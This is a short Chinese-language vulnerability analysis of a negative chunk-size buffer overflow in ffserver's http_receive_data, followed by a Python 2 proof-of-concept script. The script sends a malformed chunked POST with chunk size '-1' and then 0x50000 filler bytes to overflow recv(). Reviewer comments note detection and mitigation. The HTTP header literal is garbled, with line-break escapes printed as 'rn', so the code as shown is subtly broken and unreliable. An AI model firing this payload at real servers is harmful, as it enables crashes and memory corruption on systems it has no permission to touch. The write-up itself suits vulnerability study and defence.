cve

0x1 漏洞分析
漏洞影响 ffserver 程序，和 cve-2016-10190 类似：c->chunk_size 由 strtol 解析请求中的 chunk 大小行得到，可以为负数；当 c->chunk_size 为负数时，FFMIN 的结果仍为负，作为长度参数传给 recv 时被转换成无符号的超大值，导致 recv 溢出。

调用链（从漏洞函数向上回溯）：http_receive_data ← handle_connection ← http_server ← main
c->chunk_size = strtol(c->buffer, 0, 16);
recv(c->fd, c->buffer_ptr,
     FFMIN(c->chunk_size, c->buffer_end - c->buffer_ptr), 0);
http_receive_data(c) handle_connection(c) http_server()

0x2 poc

import socket

# Target of the PoC: the local ffserver instance named in the Host header below.
# NOTE(review): despite the names, these are the address/port the client
# connects to (see s.connect below), not a local bind address.
bind_ip = '127.0.0.1'
bind_port = 9999

# Raw HTTP POST to the feed with "Transfer-Encoding: chunked". The final line
# is the first chunk-size line, "-1": ffserver parses it with
# strtol(c->buffer, 0, 16), so c->chunk_size becomes negative and the
# FFMIN(...) bound handed to recv() is negative as well (see the analysis
# above). From a detection standpoint, a chunked request whose chunk-size
# line is negative is malformed and is the signal to look for; the
# server-side mitigation is to reject a negative parsed chunk size before it
# is used as a recv() length.
# NOTE(review): the literal is reproduced exactly as it appears on the page.
headers = """POST /feed1.ffm HTTP/1.1rnHost: 127.0.0.1:9999rnConnection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Pragma: client-id=123456
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

-1rn"""


if __name__ == '__main__':
    # Plain TCP client. The payloads below are str objects, i.e. the script is
    # written against Python 2's socket API.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    s.connect((bind_ip, bind_port))
    s.send(headers)
    
    # Body sent after the negative chunk-size line: a two-byte prefix followed
    # by 0x50000 filler bytes. Presumably this is the data recv() writes past
    # the buffer once its length bound is wrong -- the exact overflow extent is
    # not visible from this page.
    data = ''
    data += "fm"
    data += "a"*0x50000
    s.send(data)

    s.close()